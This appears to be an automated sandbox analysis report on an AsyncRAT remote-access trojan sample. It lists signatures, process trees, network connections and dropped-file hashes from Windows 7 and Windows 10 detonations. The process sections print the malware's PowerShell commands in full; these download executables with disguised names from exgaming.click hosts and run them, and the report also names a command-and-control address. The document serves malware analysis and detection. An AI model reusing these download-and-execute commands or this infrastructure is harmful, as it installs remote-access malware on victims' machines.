Analysis Overview
SHA256
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392
Threat Level: Known bad
The file 2e5d5abda2f010c8c2cceeb6ff027cc3.exe was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
AsyncRat
Asyncrat family
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-17 11:36
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win7-20240215-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
AsyncRat
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe
"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| FR | 51.254.53.24:4449 | | tcp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
Files
memory/2952-0-0x0000000000070000-0x0000000000088000-memory.dmp
memory/2952-1-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp
memory/2952-3-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2760-9-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2760-8-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2760-10-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2760-11-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2760-12-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2760-13-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2760-14-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2952-15-0x00000000778A0000-0x0000000077A49000-memory.dmp
memory/2760-16-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 8d54200180804576414e8d710472b1f0 |
| SHA1 | 54b14e2effe390f925c72eff8428411865c5323f |
| SHA256 | 8a97c800af4a71ad7e0699c8c7a8b096631d3bd7745d98110fb9f294255e4344 |
| SHA512 | bea043a056c53c2f51684f86ed9e1b1e8661631403e805358752e582d9acbdc94ccb8b6e5d91a2df2cb0969e89b7d5dcd0a73b04a02202daab78a38f300ea6e6 |
memory/2444-22-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2444-24-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-23-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-26-0x0000000001F70000-0x0000000001F78000-memory.dmp
memory/2444-25-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-29-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-28-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-27-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-30-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-31-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2612-38-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2612-39-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2612-40-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2612-42-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2612-41-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2952-43-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp
memory/2612-44-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2952-45-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2612-46-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/304-52-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/304-53-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-55-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-54-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/304-56-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-57-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-58-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2952-59-0x00000000778A0000-0x0000000077A49000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win10v2004-20240412-en
Max time kernel
146s
Max time network
148s
Command Line
Signatures
AsyncRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe
"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| FR | 51.254.53.24:4449 | | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
| FR | 51.254.53.24:4449 | | tcp |
Files
memory/4228-0-0x0000000000D70000-0x0000000000D88000-memory.dmp
memory/4228-1-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-3-0x0000000002E30000-0x0000000002E40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bunyhk2y.lbc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3972-15-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-14-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3972-13-0x00000234557B0000-0x00000234557D2000-memory.dmp
memory/3972-16-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-17-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-20-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e52ff3673869a8c21697e9cc80b586a9 |
| SHA1 | d86961b3dcd781a87ad6360bd69c0e4ad6ad3456 |
| SHA256 | 4263e18a993ae6da36463829ecf6f02b13035555a6f83c6f9aa048cf1151f7cc |
| SHA512 | 70e7ffc8794613d45666be095dcdb22cea7b7ea27a910cdaee1f1d3a7e313b3b0cbf5bb0889cfa4cc9b7b93963302d259d73f7ed315b15f5d8d11c0e6b1d7ead |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eab4488871ac8f99a41386e5ffbb78ff |
| SHA1 | 552887e75c58595744ff3cbc0fcf0b0ef855b0aa |
| SHA256 | dbff195e70764404bf89dd342f6eb991e377292f7de93f4791d397d2621dd279 |
| SHA512 | 5670d6c233702f066776a44e7d194b9f388e02002b975fdfbc38ee0a41d778307e80a62678e26bee68a3b1aa11ca67c297408c5880abaa7cf3a70e00d7b09bfc |
memory/2568-32-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/2568-33-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-34-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-35-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-37-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3464-38-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3464-39-0x00000274E6050000-0x00000274E6060000-memory.dmp
memory/3464-40-0x00000274E6050000-0x00000274E6060000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab6a608d425ee999e520555e510f2856 |
| SHA1 | e8da9bcbd7dbf6cbe542cd27a683f27811851822 |
| SHA256 | 44fb5a8164271cda3525070f3fa5f1b86db92ec1c3011f3233b7fce5126826b2 |
| SHA512 | 3b5c9486b6da018a20c3d42876e821bff0560a5a51e0ede165ac5a2ef7e1f5152bd56e0e7849f4a92f2a3873bcec62afc84cb680a8d1adf42016dce00bacfb87 |
memory/3464-51-0x00000274E6050000-0x00000274E6060000-memory.dmp
memory/3464-53-0x00000274FE550000-0x00000274FE76C000-memory.dmp
memory/3464-54-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-55-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ff65cdc439b64c97f807c217688786aa |
| SHA1 | d57bd6d0a7390ede6056c768c7b0ad8249de554c |
| SHA256 | d24255ef8f08aa0d0a35ba6371737ca124c5b421f3797e5cbd7838d3a746fb51 |
| SHA512 | 75fce51496590db3fd58aad8dc1397760a2ac2c821649489ac12cf0ec754012186c6ecc177efa8c08ddeec3d3f47a7ef24f5e1f1b6380ddc59434293b4e5dd25 |
memory/4920-66-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-69-0x0000000002E30000-0x0000000002E40000-memory.dmp
memory/4920-67-0x0000024071180000-0x0000024071190000-memory.dmp
memory/4920-68-0x0000024071180000-0x0000024071190000-memory.dmp
memory/4920-71-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp